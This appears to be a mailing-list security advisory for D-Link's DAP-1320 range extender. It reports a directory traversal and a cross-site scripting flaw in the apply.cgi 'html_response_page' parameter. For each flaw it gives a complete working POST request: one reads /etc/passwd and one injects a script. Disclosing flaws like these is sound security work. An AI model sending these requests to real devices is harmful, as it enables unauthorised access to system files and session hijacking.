D-Link's DAP-1320 Wireless Range Extender suffers from both a directory traversal and a XSS vulnerability on all firmware versions. (current v. 1.20B07) ---------------------------------------------------------------------------= ------------------------------------------ Directory Traversal CWE-22: Path Traversal The POST param 'html_response_page' of apply.cgi suffers from a directory traversal vulnerability. The following example will display the contents of /etc/passwd: http://<IP>/apply.cgi Pragma: no-cache Cache-control: no-cache Content-Type: application/x-www-form-urlencoded POST html_response_page=3D%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F.= ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&login_name=3D&html_resp= onse_message=3Djust_login&log_pass=3D&login_n=3Dadmin&action=3Ddo_graph_aut= h&tmp_log_pass=3DPAN&tmp_log_pass_auth=3DFRIED&graph_code=3D0DEY&session_id= =3D57687&gcode_base64=3D8TEHPOO%3D HTTP/1.1 ---------------------------------------------------------------------------= ------------------------------------------ XSS CWE-79: Cross Site Scripting The POST param 'html_response_page' of apply.cgi suffers from a XSS vulnerability. Example: http://<IP>/apply.cgi Pragma: no-cache Cache-control: no-cache Content-Type: application/x-www-form-urlencoded POST html_response_page=3D%3Cscript%3Ealert%28"SquirrelLord"%29%3B%3C%2Fscript%3= E&login_name=3DHuggy&html_response_message=3Djust_login&log_pass=3D&login_n= =3Dadmin&action=3Ddo_graph_auth&tmp_log_pass=3Dpop&tmp_log_pass_auth=3Dgoes= &graph_code=3Djoffrey&session_id=3D57687&gcode_base64=3DZZTOPI%3D HTTP/1.1 ---------------------------------------------------------------------------= ------------------------------------------ Vendor Link: http://support.dlink.com/ProductInfo.aspx?m=3DDAP-1320 Research Contact: K Lovett